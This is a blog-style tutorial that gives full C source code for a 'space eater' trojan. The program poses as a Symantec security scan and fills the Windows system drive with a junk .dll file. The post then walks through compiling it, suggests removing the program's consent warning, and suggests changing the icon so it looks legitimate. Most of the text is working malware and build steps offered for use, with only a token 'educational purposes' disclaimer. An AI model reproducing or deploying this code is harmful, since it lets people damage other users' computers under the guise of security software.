How to Make a Trojan Horse

Most of you may be curious to know how to make a Trojan or virus on your own. Well, here is an answer to your curiosity. In this post, I’ll show you how to make a simple trojan on your own using the C programming language. This trojan, when executed, will eat up the hard disk space on the root drive (the drive on which Windows is installed, usually the C: drive) of the computer on which it is run. Also, this trojan works pretty quickly and is capable of eating up approximately 1 GB of hard disk space for every minute it is run. Unlike what many of us think, a trojan horse is not a virus. In simple words, it is just a program that appears to do a favorable task but in reality performs undisclosed malicious functions that allow the attacker to gain unauthorized access to the host machine or cause damage to the computer.

Now let’s move on to the working of our Trojan:

The trojan horse which I have created presents itself as an antivirus program that scans the computer for malware programs. However, in reality it does nothing other than eat up the hard disk space on the root drive by filling it up with a huge junk file. The rate at which it fills up the hard disk space is too high. As a result, the root drive gets filled up completely within minutes of running this program.
Once the disk space is full, the trojan reports that the scan is complete. The victim will not be able to clean up the hard disk space using any of the cleanup programs. This is because the trojan intelligently creates a huge file in the Windows\System32 folder with the .dll extension. Since the junk file has the .dll extension, it is often ignored by the disk cleanup software. Hence there is no way to recover the hard disk space other than reformatting the drive.

The algorithm of the Trojan is as follows:

  1. Search for the root drive.
  2. Navigate to %systemroot%\Windows\System32 on the root drive.
  3. Create the file named “spceshot.dll”.
  4. Start dumping the junk data onto the above file and keep increasing its size until the drive is full.
  5. Once the drive is full, stop the process.

    Here is the code:
    /* SPACE EATER TROJAN . USE IT FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD!*/

    #include<stdio.h>
    #include<conio.h>
    #include<dos.h>
    #include<stdlib.h>
    FILE *a,*t,*b;
    int r,status,vir_count;
    double i;
    char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice;

    void eatspace(void);
    void findroot(void);
    void showstatus(void);
    void draw(void);
    void accept(void);

    void main()
    {
    draw();
    accept();
    textcolor(WHITE);
    draw();
    gotoxy(12,8);
    cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT...");
    sleep(3);
    gotoxy(12,8);
    delline();
    cputs("PRESS ANY KEY TO START THE SYSTEM SCAN...");
    getch();
    gotoxy(12,8);
    delline();
    findroot();
    }

    void accept()
    {
    textcolor(LIGHTRED);
    gotoxy(1,8);
    cputs("THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS PROGRAM IT WILL\n\rEAT UP YOUR FULL HARD DISK SPACE ON ROOT DRIVE. HOWEVER IT IS POSSIBLE TO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\'VE TO DELETE THE FILE \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rIF YOU WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT.");

    if((choice=getch())!=13)
    exit(0);
    }

    void draw()
    {
    clrscr();
    textcolor(WHITE);
    gotoxy(12,2);
    cputs("********************************************************");
    gotoxy(12,6);
    cputs("********************************************************");
    gotoxy(12,3);
    cputs("*\n\b*\n\b*\n\b");
    gotoxy(67,3);
    cputs("*\n\b*\n\b*\n\b");
    gotoxy(14,4);
    cputs("SYMANTEC SECURITY SCAN - 2009 (QUICK SYSTEM SCANNER)");
    }

    void findroot()
    {
    t=fopen("C:\\windows\\explorer.exe","rb");
    if(t!=NULL)
    {
    fclose(t);
    textcolor(WHITE);
    a=fopen("C:\\windows\\system32\\spceshot.dll","rb");
    if(a!=NULL)
    {
    textcolor(LIGHTRED);
    gotoxy(12,8);
    cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
    getch();
    exit(1);
    }
    b=fopen("C:\\windows\\system32\\spceshot.dll","wb+");
    if(b!=NULL)
    {
    showstatus();
    eatspace();
    }
    }
    t=fopen("D:\\windows\\explorer.exe","rb");
    if(t!=NULL)
    {
    fclose(t);
    a=fopen("D:\\windows\\system32\\spceshot.dll","rb");
    if(a!=NULL)
    {
    textcolor(LIGHTRED);
    gotoxy(12,8);
    cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
    getch();
    exit(1);
    }
    b=fopen("D:\\windows\\system32\\spceshot.dll","wb+");
    if(b!=NULL)
    {
    showstatus();
    eatspace();
    }
    }
    t=fopen("E:\\windows\\explorer.exe","rb");
    if(t!=NULL)
    {
    fclose(t);
    a=fopen("E:\\windows\\system32\\spceshot.dll","rb");
    if(a!=NULL)
    {
    textcolor(LIGHTRED);
    gotoxy(12,8);
    cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
    getch();
    exit(1);
    }
    b=fopen("E:\\windows\\system32\\spceshot.dll","wb+");
    if(b!=NULL)
    {
    showstatus();
    eatspace();
    }
    }
    t=fopen("F:\\windows\\explorer.exe","rb");
    if(t!=NULL)
    {
    fclose(t);
    a=fopen("F:\\windows\\system32\\spceshot.dll","rb");
    if(a!=NULL)
    {
    textcolor(LIGHTRED);
    gotoxy(12,8);
    cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
    getch();
    exit(1);
    }
    b=fopen("F:\\windows\\system32\\spceshot.dll","wb+");
    if(b!=NULL)
    {
    showstatus();
    eatspace();
    }
    }
    if(t==NULL)
    {
    textcolor(LIGHTRED);
    gotoxy(12,8);
    cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM.");
    getch();
    exit(1);
    }
    exit(1);
    }

    void eatspace()
    {
    textcolor(LIGHTRED);
    gotoxy(12,16);
    cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n");
    textcolor(WHITE);
    gotoxy(12,18);
    while(1)
    {
    for(r=1;r<4;r++)
    {
    for(i=1;i<900000;i++)
    {
    status=fputs(ch,b);
    if(status==EOF)
    {
    textcolor(WHITE);
    vir_count=random(120);
    draw();
    gotoxy(12,8);
    cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count);
    gotoxy(12,10);
    cprintf("PRESS ANY KEY TO CLOSE...");
    getch();
    break;
    }
    }
    cputs(".");
    if(status==EOF) break;
    }
    if(status==EOF) break;
    }
    exit(0);
    }

    void showstatus()
    {
    gotoxy(12,8);
    cputs("SCANNING THE SYSTEM FOR THREATS");
    gotoxy(12,10);
    cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS");
    gotoxy(12,13);
    cputs("SCAN IN PROGRESS. PLEASE WAIT...");
    }

    Please note that I have not included the executable for security reasons. You need to compile it to obtain the executable.

    How to compile the program?

    If you’re new to C programming and find it difficult to compile C source code, then this step-by-step compilation guide is for you.
    Here is a step-by-step procedure to install the Borland C++ compiler 5.5 on your PC and compile C programs.

    How to Install Borland C++ compiler?

    Follow the below steps to install Borland C++ compiler 5.5 on your PC:
    1. Download Borland C++ compiler 5.5 (for Windows platform) from the following link:
    2. After you download, run the file C++5.51.exe. The default installation path would be:
      C:\Borland\BCC55

    How to configure Borland C++ compiler?

    Here is a step-by-step instruction on how to configure the compiler:
    1. After you install the Borland C++ compiler, create two new Text Documents.
    2. Open the first New Text Document.txt file and add the following two lines into it:
      -I"c:\Borland\Bcc55\include"
      -L"c:\Borland\Bcc55\lib"
      Save changes and close the file. Now rename the file from New Text Document.txt to bcc32.cfg.
    3. Open the second New Text Document (2).txt file and add the following line into it:
      -L"c:\Borland\Bcc55\lib"
      Save changes and close the file. Rename the file from New Text Document (2).txt to ilink32.cfg.
    4. Now copy the two files bcc32.cfg and ilink32.cfg, navigate to C:\Borland\BCC55\Bin and paste them.

    How to Compile the C Source Code (.C files)?

    Here are detailed instructions on how to compile C source code:
    1. You need to place the .C (example.c) file to be compiled in the following location:
      C:\Borland\BCC55\Bin
    2. Now go to the command prompt (Start->Run->type cmd->Enter).
    3. Make the following path the present working directory (use the CD command):
      C:\Borland\BCC55\Bin
    4. To compile the file (example.c) use the following command:
      bcc32 example.c
    5. Now if there exists no error in the source code, you’ll get a compiled executable module (example.exe) in the same location (C:\Borland\BCC55\Bin).
    6. Now you have successfully compiled the source code into an executable file (.exe file).

      How to test this trojan horse?

      To test the trojan, just run the SpaceEater.exe file on your computer. It will generate a warning message at the beginning. Once you accept it, the Trojan runs and eats up the hard disk space.
      NOTE: To remove the warning message you’ve to edit the source code and then re-compile it.

      How to fix the damage and free up the space?

      To remove the damage and free up the space, just type the following in the “run” dialog box:
      %systemroot%\system32
      Now search for the file “spceshot.dll”. Just delete it and you’re done. No need to re-format the hard disk.
      NOTE: You can also change the ICON of the virus to make it look like a legitimate program. This method is described in the post: How to Change the ICON of an EXE file?
      Please pass your comments and tell me your opinion. I am just waiting for your comments. :)
